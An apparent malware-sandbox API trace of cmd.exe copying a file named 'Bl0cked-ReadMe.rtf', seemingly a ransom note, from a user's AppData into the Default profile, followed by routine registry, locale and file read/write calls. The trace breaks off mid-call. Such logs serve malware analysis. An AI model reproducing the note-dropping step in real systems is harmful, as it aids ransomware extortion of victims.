_get_osfhandle (_FileHandle=1) returned 0x7 [0215.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.697] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.698] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.698] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.698] GetEnvironmentStringsW () returned 0x200150* [0215.698] FreeEnvironmentStringsW (penv=0x200150) returned 1 [0215.698] GetEnvironmentStringsW () returned 0x200150* [0215.698] FreeEnvironmentStringsW (penv=0x200150) returned 1 [0215.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x78, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegCloseKey (hKey=0x40) returned 0x0 [0215.698] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.699] RegCloseKey (hKey=0x40) returned 0x0 [0215.699] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.699] srand (_Seed=0x5b8863b1) [0215.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"" [0215.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"" [0215.699] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2018b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.699] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.699] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.699] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.699] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.699] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.699] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.700] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.700] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.700] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.700] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.700] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.700] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.700] GetEnvironmentStringsW () returned 0x2022a0* [0215.700] FreeEnvironmentStringsW (penv=0x2022a0) returned 1 [0215.700] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.700] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.700] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.700] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.700] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.700] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.700] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.700] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.700] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.700] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f638 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.700] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f638, lpFilePart=0x18f634 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f634*="Desktop") returned 0x18 [0215.700] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.700] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x1fffe0 [0215.700] FindClose (in: hFindFile=0x1fffe0 | out: hFindFile=0x1fffe0) returned 1 [0215.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x1fffe0 [0215.701] FindClose (in: hFindFile=0x1fffe0 | out: hFindFile=0x1fffe0) returned 1 [0215.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x1fffe0 [0215.701] FindClose (in: hFindFile=0x1fffe0 | out: hFindFile=0x1fffe0) returned 1 [0215.701] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.701] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.701] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.701] GetEnvironmentStringsW () returned 0x202ac0* [0215.701] FreeEnvironmentStringsW (penv=0x202ac0) returned 1 [0215.701] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.702] GetConsoleOutputCP () returned 0x1b5 [0215.702] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.702] GetUserDefaultLCID () returned 0x409 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f778, cchData=128 | out: lpLCData="1") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.703] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.703] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.703] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.703] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.703] GetConsoleTitleW (in: lpConsoleTitle=0x1f08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.704] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.704] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.704] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.704] _wcsicmp (_String1="type", _String2=")") returned 75 [0215.704] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0215.704] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0215.704] _wcsicmp (_String1="IF", _String2="type") returned -11 [0215.704] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0215.704] _wcsicmp (_String1="REM", _String2="type") returned -2 [0215.704] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0215.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.708] GetFileType (hFile=0x7) returned 0x2 [0215.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.708] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f670 | out: lpMode=0x18f670) returned 1 [0215.708] _dup (_FileHandle=1) returned 3 [0215.708] _close (_FileHandle=1) returned 0 [0215.708] _wcsicmp (_String1="C:\\Users\\Default\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0215.708] CreateFileW (lpFileName="C:\\Users\\Default\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f640, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0215.709] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0215.709] GetConsoleTitleW (in: lpConsoleTitle=0x18f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.710] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0215.710] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0215.710] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0215.710] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0215.710] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.711] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18efd4) returned 0x1f0e30 [0215.711] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0215.711] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0215.711] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0215.711] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dee0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0215.711] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] GetFileType (hFile=0x54) returned 0x1 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18df38 | out: lpFileSizeHigh=0x18df38*=0x0) returned 0x1632 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.711] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.711] GetFileType (hFile=0x4c) returned 0x1 [0215.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.711] GetFileType (hFile=0x4c) returned 0x1 [0215.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.712] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.713] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.713] GetFileType (hFile=0x4c) returned 0x1 [0215.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.714] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.714] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] GetFileType (hFile=0x4c) returned 0x1 [0215.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.715] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: 